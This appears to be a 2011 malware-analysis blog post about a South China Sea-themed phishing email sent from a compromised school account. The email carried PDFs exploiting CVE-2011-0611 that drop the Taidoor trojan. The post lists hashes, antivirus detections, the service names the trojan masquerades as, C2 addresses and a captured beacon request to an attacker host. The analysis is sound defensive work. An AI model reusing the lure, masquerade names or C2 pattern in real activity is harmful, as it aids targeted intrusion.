-- This message came from a compromised account of mail.ppboces.org - mail server for Pikes Peak Board of Cooperative Educational Services in Colorado Springs, Co.It has two attachments exploiting CVE-2011-0611.--The payload is Trojan Taidoor / Rubinurd, which is a frequently used trojan for targeted attacks. (see more with Taidoor here) For attribution reasons, I would like to know if this is a private custom trojan or something commercial and thus used by more than one group of attackers. If you happen to know, let me know. The PDF and the payload have Chinese language in the file metadata and code.
-- The CC IP addresses are 62.38.148.117 ( 443 80) -Hellas On Line S.A., Greece, Attiki and 64.167.26.66 (80) - SBC Internet Services, Costa Mesa, CA
Common Vulnerabilities and Exposures (CVE)number
CVE-2011-0611
Adobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and Solaris and 10.2.156.12 and earlier on Android; Adobe AIR before 2.6.19140; and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader 9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x before 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x before 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content; as demonstrated by a Microsoft Office document with an embedded .swf file that has a size inconsistency in a "group of included constants," object type confusion, ActionScript that adds custom functions to prototypes, and Date objects; and as exploited in the wild in April 2011.
General File information
File Name: 90-2011 Robert Beckman.pdf
MD5 : 6fdc8f02e7f649a6c0d2a72e421a5bf9
File size : 249913 bytes
Distribution: Email attachment
File Name: 91-2011 Sam Bateman.pdf
MD5 : 6fdc8f02e7f649a6c0d2a72e421a5bf9
File size : 249913 bytes
Download
Original Message
From: Hxxxxxxxx, Mxxxxxxxx (xxxxxxxxx) [mailto:mhxxxxxxxxxxxx@ppboces.org]
Sent: Monday, June 27, 2011 8:46 AM
To: dothanhhai80@gmail.com
Subject: Two Views On The South China Sea
Dear all,
1. We are pleased to attach for your reading pleasure two views on the South China Sea.
2. Synopsis I: Robert Beckman on the South China Sea: Worsening Dispute or Growing Clarity in Claims?
In May 2009 Malaysia and Vietnam made submissions to extend their continental shelves beyond 200 nautical miles into the South China Sea, and China objected to their submissions. While adding a layer of complexity to the South China Sea disputes, the submissions and objections also clarified the claims of the competing states.
3. Synopsis 2: Sam Bateman on the South China Sea: When the Elephants Dance.
The situation in the South China Sea has deteriorated recently. The three key players -- China, the United States and Vietnam -- can all accept some
responsibility for the deterioration and should now mediate their differences.
xxxxxxxxxxxxx
Executive Assistant to Archie Neil
Pikes Peak BOCES
4825 Lorna Place
Colorado Springs, CO 80915
719-622-2089
719-380-9685 fax
Message Headers
Received: (qmail 12816 invoked from network); 27 Jun 2011 12:46:08 -0000Received: from 63-253-126-17.ip.mcleodusa.net (HELO MAIL.PPBOCES.ORG) (63.253.126.17)
by xxxxxxxxx with SMTP; 27 Jun 2011 12:46:08 -0000
Return-Path: mhxxxxxxs@ppboces.org
X-Envelope-From: mhxxxxxxxxx@ppboxxxxxxxxx
Received: From bocesex01.ppboces.local (172.18.0.20) by MAIL.PPBOCES.ORG (MAILFOUNDRY) id +zJm6qC8EeCuLQAw; Mon, 27 Jun 2011 12:57:15 -0000 (GMT)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----_=_NextPart_001_01CC34C8.AD469615"
Subject: Two Views On The South China Sea
Date: Mon, 27 Jun 2011 06:45:59 -0600
Message-ID: <92E09D8019C5384A97503350032F27AC01C6F84B@bocesex01.ppboces.local>
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator:
Thread-Topic: Two Views On The South China Sea
Thread-Index: AcwZipt/3F+WVOQ6Rh2SHXBf8g3DNgbPY69E
References: <92E09D8019C5384A97503350032F27AC0170C2C7@bocesex01.ppboces.local>
From: xxxxxxxxxx@ppboces.org
To:
S
63.253.126.17
Hostname: 63-253-126-17.ip.mcleodusa.net
ISP: PaeTec Communications
Organization: PIKES PEAK BOCES
Type: Corporate
Assignment: Static IP
Country: United States us flag
State/Region: Colorado
City: Colorado Springs
This appears to be compromised account on Mail.ppboces.org
Automated Scans
90-2011 Robert Beckman.pdfhttp://www.virustotal.com/file-scan/report.html?id=1a685fae2093096e96b9a41a6aa57320008208b7d8a7e39dcf834146cbc5b5e6-1309229502
Submission date: 2011-06-28 02:51:42 (UTC)
Result: 8 /41 (19.5%)
Avast5 5.0.677.0 2011.06.27 SWF:Dropper
BitDefender 7.2 2011.06.28 Script.SWF.C06
Commtouch 5.3.2.6 2011.06.28 JS/Pdfka.V
eTrust-Vet 36.1.8411 2011.06.28 PDF/CVE-2010-1297.B!exploit
GData 22 2011.06.28 Script.SWF.C06
Microsoft 1.7000 2011.06.27 Exploit:SWF/Shellcode.B
nProtect 2011-06-27.01 2011.06.27 Script.SWF.C06
VirusBuster 14.0.98.0 2011.06.27 Exploit.SWF.Agent2.CGJE
Additional informationShow all
MD5 : a755f5b7bd80091561298d971a8f111d
91-2011 Sam Bateman.pdf
http://www.virustotal.com/file-scan/report.html?id=9bf9677524b519fc1dbc5455f78afce3dfecc1477f52874f3a6272e6eae7bb4b-1309274223
MD5 : 6fdc8f02e7f649a6c0d2a72e421a5bf9
File size : 249913 bytes
PDF information
This appears to be CVE-2011-0611, please correct me if I am wrong and it is CVE-2011-0609
I used
Didier Stevens PDF-Parser.py for dumping uncompressed raw data
pySwfCarve.py for carving out SWF by Giuseppe Bonfa
Trillix flash decompiler for decompiling flash (make sure your vm is patched)
PE Explorer for the binary
File metadata
The string in Chinese means :"Untitled"
The file checks for Reader versions and offers to upgrade if it is below version 9
Malicious pdf executed on a vulnerable version of Adobe Reader
extracted and decompiled flash file is below and you can see the full action script here
http://pastebin.com/GMQG9gi4
Payload
Trojan Taidoor - also featured in
- May-June 2011 Trojan Taidoor "Louisvilleheartsurgery.com" phishing campaign
- Feb 25 CVE-2010-3333 DOC China's Military Build-up from a compromised IBEW-NECA Joint Trust Funds account
This trojan is characterized by the traffic it generates -
http://99.1.23.71/qfgkt.php?id=030696111D308D0E8D
http://aaaaa/bbbbb.php?id=xxxxxxyyyyyyyyyyyy where
aaaaa is a host or domain
bbbbb is a 5 char string
xxxxxx is a 6 char changing string
yyyyyyyyyyyy - 12 char more or less constant string
Local Settings\one of the names listed below
File: COMSysApp.exe
Size: 22016
MD5: 17A6E614E2C95390C60C714F340214F7
List of possible names:
Alerter.exe
AppMgmt.exe
CiSvc.exe
ClipSrv.exe
COMSysApp.exe
dmadmin.exe
Dot3svc.exe
EapHost.exe
HidServ.exe
hkmsvc.exe
ImapiService.exe
Messenger.exe
mnmsrvc.exe
MSDTC.exe
MSIServer.exe
napagent.exe
NetDDE.exe
NetDDEdsdm.exe
Netlogon.exe
NtLmSsp.exe
NtmsSvc.exe
ose.exe
RasAuto.exe
RDSessMgr.exe
RemoteAccess.exe
rpcapd.exe
RpcLocator.exe
RSVP.exe
SwPrv.exe
SysmonLog.exe
TlntSvr.exe
upnphost.exe
UPS.exe
VSS.exe
WmdmPmSN.exe
Wmi.exe
WmiApSrv.exe
wuauserv.exe
xmlprov.exe
ClipSrv.exe - or any of the names above
http://www.virustotal.com/file-scan/report.html?id=e9c041225b56260851f75528bdf4b635c8974d6e5fe87b119e448a542354b2fc-1309274036
Submission date: 2011-06-28 15:13:56 (UTC)
Result: 14/ 42 (33.3%)
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2011.06.28.02 2011.06.28 Backdoor/Win32.CSon
AntiVir 7.11.10.137 2011.06.28 TR/Hijacker.Gen
AVG 10.0.0.1190 2011.06.28 Generic23.UVP
BitDefender 7.2 2011.06.28 Gen:Trojan.Heur.TP.bq1@b0OVqSkb
DrWeb 5.0.2.03300 2011.06.28 Trojan.Taidoor
F-Secure 9.0.16440.0 2011.06.28 Gen:Trojan.Heur.TP.bq1@b0OVqSkb
GData 22 2011.06.28 Gen:Trojan.Heur.TP.bq1@b0OVqSkb
Ikarus T3.1.1.104.0 2011.06.28 Trojan.SuspectCRC
Kaspersky 9.0.0.837 2011.06.28 HEUR:Trojan.Win32.Generic
McAfee 5.400.0.1158 2011.06.28 -
Microsoft 1.7000 2011.06.28 VirTool:Win32/Injector.gen!BJ
NOD32 6246 2011.06.28 a variant of Win32/Injector.HET
Norman 6.07.10 2011.06.28 W32/Obfuscated.JA
Rising 23.64.01.03 2011.06.28 Suspicious
VBA32 3.12.16.3 2011.06.28 TrojanDownloader.Rubinurd.f
Strings from the binary - also similar to other samples from the posts above
d{bw
ntdll.dll
NtUnmapViewOfSection
host.exe "
vices.exe "
%ProgramFiles%\Mcafee
GetModuleFileNameA
kernel32.dll
abcde
Language code of the file is displayed as English - United States en-us 1033 but the language ID is actually Chinese Simplified (The language ID is a word integer value made up of a primary language and its sublanguage which is defined by Windows. If the resource item is “language neutral” then this value is zero.)
Other files
File: 11.pdf
Size: 192815
MD5: 7BBE0534746D66FD012CF81219AE27A1
C:\WINDOWS\system32\d3d8caps.dat
File: d3d8caps.dat
Size: 768
MD5: 8C83D908E75F6B6971C7602CF2D26C1A
C:\WINDOWS\system32\d3d9caps.dat
File: d3d9caps.dat
Size: 664
MD5: B168F0FF0AF0292CB32DF1770A7DE164
location of the pdf\iso88591
File: iso88591
Size: 65536
MD5: 2EBA9C4FDEA2741821A836D2A325D5A5
http://www.virustotal.com/file-scan/report.html?id=e9c041225b56260851f75528bdf4b635c8974d6e5fe87b119e448a542354b2fc-1309274036
Submission date: 2011-06-28 15:13:56 (UTC)
Result: 14/ 42 (33.3%)
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2011.06.28.02 2011.06.28 Backdoor/Win32.CSon
AntiVir 7.11.10.137 2011.06.28 TR/Hijacker.Gen
AVG 10.0.0.1190 2011.06.28 Generic23.UVP
BitDefender 7.2 2011.06.28 Gen:Trojan.Heur.TP.bq1@b0OVqSkb
DrWeb 5.0.2.03300 2011.06.28 Trojan.Taidoor
F-Secure 9.0.16440.0 2011.06.28 Gen:Trojan.Heur.TP.bq1@b0OVqSkb
GData 22 2011.06.28 Gen:Trojan.Heur.TP.bq1@b0OVqSkb
Ikarus T3.1.1.104.0 2011.06.28 Trojan.SuspectCRC
Kaspersky 9.0.0.837 2011.06.28 HEUR:Trojan.Win32.Generic
McAfee 5.400.0.1158 2011.06.28 -
Microsoft 1.7000 2011.06.28 VirTool:Win32/Injector.gen!BJ
NOD32 6246 2011.06.28 a variant of Win32/Injector.HET
Norman 6.07.10 2011.06.28 W32/Obfuscated.JA
Rising 23.64.01.03 2011.06.28 Suspicious
VBA32 3.12.16.3 2011.06.28 TrojanDownloader.Rubinurd.f
Strings from the binary - also similar to other samples from the posts above
d{bw
ntdll.dll
NtUnmapViewOfSection
host.exe "
vices.exe "
%ProgramFiles%\Mcafee
GetModuleFileNameA
kernel32.dll
abcde
Language code of the file is displayed as English - United States en-us 1033 but the language ID is actually Chinese Simplified (The language ID is a word integer value made up of a primary language and its sublanguage which is defined by Windows. If the resource item is “language neutral” then this value is zero.)
Other files
File: 11.pdf
Size: 192815
MD5: 7BBE0534746D66FD012CF81219AE27A1
C:\WINDOWS\system32\d3d8caps.dat
File: d3d8caps.dat
Size: 768
MD5: 8C83D908E75F6B6971C7602CF2D26C1A
C:\WINDOWS\system32\d3d9caps.dat
File: d3d9caps.dat
Size: 664
MD5: B168F0FF0AF0292CB32DF1770A7DE164
location of the pdf\iso88591
File: iso88591
Size: 65536
MD5: 2EBA9C4FDEA2741821A836D2A325D5A5
Traffic
Hostname: adsl-64-167-26-66.dsl.lsan03.pacbell.netISP: SBC Internet Services
Organization: SBC Internet Services
Country: United States
State/Region: California
City: Costa Mesa
Hostname: static062038148117.dsl.hol.gr
ISP: Hellas On Line S.A.
Organization: Hellas On Line S.A.
Country: Greece
State/Region: Attiki
GET /glsma.php?id=0141281911380G7603 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 62.38.148.117:443
Connection: Keep-Alive
Cache-Control: no-cache
No comments:
Post a Comment